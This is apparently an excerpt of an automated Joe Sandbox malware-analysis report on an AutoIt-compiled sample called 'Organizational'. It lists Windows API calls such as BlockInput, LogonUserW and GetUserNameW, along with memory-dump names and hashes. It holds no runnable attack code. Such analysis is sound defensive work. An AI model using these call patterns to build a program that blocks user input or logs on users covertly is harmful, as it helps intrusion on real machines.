                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 0ea6ab28e3eeba619dd24664d611ff3ac0d6c884435ef5b5f72184a0d061d85c
                                                          • Instruction ID: fde2e213e9962451cd486e00a797a2be563c7c5a92039fc82378e8fe2c98bfa2
                                                          • Opcode Fuzzy Hash: 0ea6ab28e3eeba619dd24664d611ff3ac0d6c884435ef5b5f72184a0d061d85c
                                                          • Instruction Fuzzy Hash: 21E09A312202159FD300BF5AE844E9BF7E8AFA87A0B00801AFC09CB350DAB0E9518B90
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002B5205
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: 9d4a97fa2a669074d99087474e52657d43c1459a3f43b572ad4cdd0cb681c304
                                                          • Instruction ID: 6c96951dd6626ecf1a71992b0caf6904f158a9df885d3b92b35ba7729d9b3865
                                                          • Opcode Fuzzy Hash: 9d4a97fa2a669074d99087474e52657d43c1459a3f43b572ad4cdd0cb681c304
                                                          • Instruction Fuzzy Hash: 8ED092A51B0F6A79FD580B2C9E1FFFA1608F3017C1FD48649714A8D0C2ECD568A6A831
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002A8FA7), ref: 002A9389
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: b3527bf9762bb68d71450048f3b97023a165acf72d3d78566dbe3d3f29998ac0
                                                          • Instruction ID: 714644fdec9f35a47f79379450562d4bedb9217b6c8ac7f8f3de09a71b7f8a07
                                                          • Opcode Fuzzy Hash: b3527bf9762bb68d71450048f3b97023a165acf72d3d78566dbe3d3f29998ac0
                                                          • Instruction Fuzzy Hash: 48D05E322A050EABEF018EA4EC45EAE3B69EB04B01F408111FE15C50A0C775D835AB60
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00290734
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 83d6f132c8dcfe31ec9342942984e55fd64ad55940418f3aba57eed0380d54d8
                                                          • Instruction ID: 2d5f241647d061f10fbd4958969c89a6eee21252ee4f02612d83168b16c44fea
                                                          • Opcode Fuzzy Hash: 83d6f132c8dcfe31ec9342942984e55fd64ad55940418f3aba57eed0380d54d8
                                                          • Instruction Fuzzy Hash: 66C04CF181010DDBCB05DBA0D9C8EEE77BCAB04304F140055A115B2100D7B49B848A71
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0027A35A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 48327609827183629a1cbdb0466ffaf1fe0a98ebb8995045955031681241030d
                                                          • Instruction ID: e74ed6647e9f0e15f591b0b9ce2762f42f371d615a5788ccc4b9b51eecbafd34
                                                          • Opcode Fuzzy Hash: 48327609827183629a1cbdb0466ffaf1fe0a98ebb8995045955031681241030d
                                                          • Instruction Fuzzy Hash: 74A0243005010CF7CF001F41FC4C4447F5CD7001507404050FC0C04031C773545145C0
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,002E0980), ref: 002D3C65
                                                          • IsWindowVisible.USER32(?), ref: 002D3C89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: f06a69a3add18e9a55681bfaa4ad6d257d3a516e2127d3456bb345b7b9002401
                                                          • Instruction ID: 136f260543752341703e4de6055cf36c0ac58dba0f93b53dc49caf4e59867d8d
                                                          • Opcode Fuzzy Hash: f06a69a3add18e9a55681bfaa4ad6d257d3a516e2127d3456bb345b7b9002401
                                                          • Instruction Fuzzy Hash: 03D18034234305CBCB14EF10C491A6AB7A5EF94354F148959F8465B3E2CB71EE6ACF42
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 002DAC55
                                                          • GetSysColorBrush.USER32(0000000F), ref: 002DAC86
                                                          • GetSysColor.USER32(0000000F), ref: 002DAC92
                                                          • SetBkColor.GDI32(?,000000FF), ref: 002DACAC
                                                          • SelectObject.GDI32(?,?), ref: 002DACBB
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 002DACE6
                                                          • GetSysColor.USER32(00000010), ref: 002DACEE
                                                          • CreateSolidBrush.GDI32(00000000), ref: 002DACF5
                                                          • FrameRect.USER32(?,?,00000000), ref: 002DAD04
                                                          • DeleteObject.GDI32(00000000), ref: 002DAD0B
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 002DAD56
                                                          • FillRect.USER32(?,?,?), ref: 002DAD88
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002DADB3
                                                            • Part of subcall function 002DAF18: GetSysColor.USER32(00000012), ref: 002DAF51
                                                            • Part of subcall function 002DAF18: SetTextColor.GDI32(?,?), ref: 002DAF55
                                                            • Part of subcall function 002DAF18: GetSysColorBrush.USER32(0000000F), ref: 002DAF6B
                                                            • Part of subcall function 002DAF18: GetSysColor.USER32(0000000F), ref: 002DAF76
                                                            • Part of subcall function 002DAF18: GetSysColor.USER32(00000011), ref: 002DAF93
                                                            • Part of subcall function 002DAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DAFA1
                                                            • Part of subcall function 002DAF18: SelectObject.GDI32(?,00000000), ref: 002DAFB2
                                                            • Part of subcall function 002DAF18: SetBkColor.GDI32(?,00000000), ref: 002DAFBB
                                                            • Part of subcall function 002DAF18: SelectObject.GDI32(?,?), ref: 002DAFC8
                                                            • Part of subcall function 002DAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 002DAFE7
                                                            • Part of subcall function 002DAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DAFFE
                                                            • Part of subcall function 002DAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 002DB013
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: 901cbe9a3e474a2ad376b039d32c605dafa1bff7d0ae9fa5978f8839718f1170
                                                          • Instruction ID: f618423b057c74de4fce065b0134b33ccae150f9d6b0343e1aaf756bd17138ac
                                                          • Opcode Fuzzy Hash: 901cbe9a3e474a2ad376b039d32c605dafa1bff7d0ae9fa5978f8839718f1170
                                                          • Instruction Fuzzy Hash: A7A1C471058341AFD7119F64EC8CE6B7BA9FF88321F100A1AF5569A2E0C7B4D885CF52
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00253072
                                                          • DeleteObject.GDI32(00000000), ref: 002530B8
                                                          • DeleteObject.GDI32(00000000), ref: 002530C3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 002530CE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 002530D9
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0028C77C
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0028C7B5
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0028CBDE
                                                            • Part of subcall function 00251F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252412,?,00000000,?,?,?,?,00251AA7,00000000,?), ref: 00251F76
                                                          • SendMessageW.USER32(?,00001053), ref: 0028CC1B
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0028CC32
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028CC48
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028CC53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: 9456c7f34e609ba0e1cca1c4ecf6bdf8ed65bcd632e57ddcbba303b7a86a11a6
                                                          • Instruction ID: 43646fbf71f242f4f27bc9648a7ee45dc75f0eed4fb67c648518e1c2cb6f9df5
                                                          • Opcode Fuzzy Hash: 9456c7f34e609ba0e1cca1c4ecf6bdf8ed65bcd632e57ddcbba303b7a86a11a6
                                                          • Instruction Fuzzy Hash: 8E12C234525202DFDB25EF24C888BA9B7A5FF04311F244569F845CB292C771ED66CFA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 2660009612-1645009161
                                                          • Opcode ID: be7ab12f0e764a94e35ef29daae0b43e20afb143503121a6a25a1f43b9435c76
                                                          • Instruction ID: 51e66fc8755fe768f56f80146ba0bb2501a49a191c664b50d6e4a05b05a39498
                                                          • Opcode Fuzzy Hash: be7ab12f0e764a94e35ef29daae0b43e20afb143503121a6a25a1f43b9435c76
                                                          • Instruction Fuzzy Hash: E4A1A430A6020AFBCF10EF61CD52EAE7778AF45740F144029F905AB292DB719EB5DB60
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 002C7BC8
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C7C87
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002C7CC5
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002C7CD7
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002C7D1D
                                                          • GetClientRect.USER32(00000000,?), ref: 002C7D29
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002C7D6D
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C7D7C
                                                          • GetStockObject.GDI32(00000011), ref: 002C7D8C
                                                          • SelectObject.GDI32(00000000,00000000), ref: 002C7D90
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002C7DA0
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C7DA9
                                                          • DeleteDC.GDI32(00000000), ref: 002C7DB2
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C7DDE
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 002C7DF5
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002C7E30
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C7E44
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 002C7E55
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002C7E85
                                                          • GetStockObject.GDI32(00000011), ref: 002C7E90
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C7E9B
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002C7EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 4fb09a6d4e1b56ebf1f66e0f0a44ff9b9be0ab695c2541c9b269eebe67cd3f1a
                                                          • Instruction ID: df99d7c9abfea25635aa9de479c5310a50af24b2a3484a9817206fc259b2bef5
                                                          • Opcode Fuzzy Hash: 4fb09a6d4e1b56ebf1f66e0f0a44ff9b9be0ab695c2541c9b269eebe67cd3f1a
                                                          • Instruction Fuzzy Hash: 62A16271650215AFEB149BA4DC8AFAE777DEB08710F048514FA14AB2E0C6B0AD52CF64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 002BB361
                                                          • GetDriveTypeW.KERNEL32(?,002E2C4C,?,\\.\,002E0980), ref: 002BB43E
                                                          • SetErrorMode.KERNEL32(00000000,002E2C4C,?,\\.\,002E0980), ref: 002BB59C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 78fcc13f0e3ce977202002efa81f28248fe17882cf6d333a0115ea847226470b
                                                          • Instruction ID: 25ed28e0a4a48197102e24bc99779888f6b00770991d72f8303bc16bdc4424bc
                                                          • Opcode Fuzzy Hash: 78fcc13f0e3ce977202002efa81f28248fe17882cf6d333a0115ea847226470b
                                                          • Instruction Fuzzy Hash: B4518530B71209DFCB22DF21C9929FDB7B0AF457807644015E406A76D1D7F1AEA1CB66
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002DA0F7
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002DA1B0
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 002DA1CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: 84031d3c67488390d9818d064441f8ca08777195163a6d940e2b8cdda6e9a09f
                                                          • Instruction ID: 610c0fd6f91d0d306a80ffa02b834cbea3f51d282cf388f6899812210c19afef
                                                          • Opcode Fuzzy Hash: 84031d3c67488390d9818d064441f8ca08777195163a6d940e2b8cdda6e9a09f
                                                          • Instruction Fuzzy Hash: 6E02E030128242AFDB15CF18D888FAABBE5FF49314F08851AF995963A0C7B4DD65CF52
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 002DAF51
                                                          • SetTextColor.GDI32(?,?), ref: 002DAF55
                                                          • GetSysColorBrush.USER32(0000000F), ref: 002DAF6B
                                                          • GetSysColor.USER32(0000000F), ref: 002DAF76
                                                          • CreateSolidBrush.GDI32(?), ref: 002DAF7B
                                                          • GetSysColor.USER32(00000011), ref: 002DAF93
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DAFA1
                                                          • SelectObject.GDI32(?,00000000), ref: 002DAFB2
                                                          • SetBkColor.GDI32(?,00000000), ref: 002DAFBB
                                                          • SelectObject.GDI32(?,?), ref: 002DAFC8
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 002DAFE7
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DAFFE
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 002DB013
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DB05F
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002DB086
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 002DB0A4
                                                          • DrawFocusRect.USER32(?,?), ref: 002DB0AF
                                                          • GetSysColor.USER32(00000011), ref: 002DB0BD
                                                          • SetTextColor.GDI32(?,00000000), ref: 002DB0C5
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002DB0D9
                                                          • SelectObject.GDI32(?,002DAC1F), ref: 002DB0F0
                                                          • DeleteObject.GDI32(?), ref: 002DB0FB
                                                          • SelectObject.GDI32(?,?), ref: 002DB101
                                                          • DeleteObject.GDI32(?), ref: 002DB106
                                                          • SetTextColor.GDI32(?,?), ref: 002DB10C
                                                          • SetBkColor.GDI32(?,?), ref: 002DB116
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: b9eb1ef466184be5c7e65d9b7b2c5f1cc6bc385bc2bdb8c5bcabb88024f6e46a
                                                          • Instruction ID: 6dc4f45935606c1b53eeb743dd4ca7e6494e51777f10ca600e737a517f56e996
                                                          • Opcode Fuzzy Hash: b9eb1ef466184be5c7e65d9b7b2c5f1cc6bc385bc2bdb8c5bcabb88024f6e46a
                                                          • Instruction Fuzzy Hash: 9F616B71940218AFDB119FA4EC88EAE7B79FF08320F114116F919AF2A1D7B59D91CF90
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002D90EA
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D90FB
                                                          • CharNextW.USER32(0000014E), ref: 002D912A
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002D916B
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002D9181
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D9192
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002D91AF
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 002D91FB
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002D9211
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D9242
                                                          • _memset.LIBCMT ref: 002D9267
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002D92B0
                                                          • _memset.LIBCMT ref: 002D930F
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D9339
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 002D9391
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 002D943E
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 002D9460
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D94AA
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D94D7
                                                          • DrawMenuBar.USER32(?), ref: 002D94E6
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 002D950E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
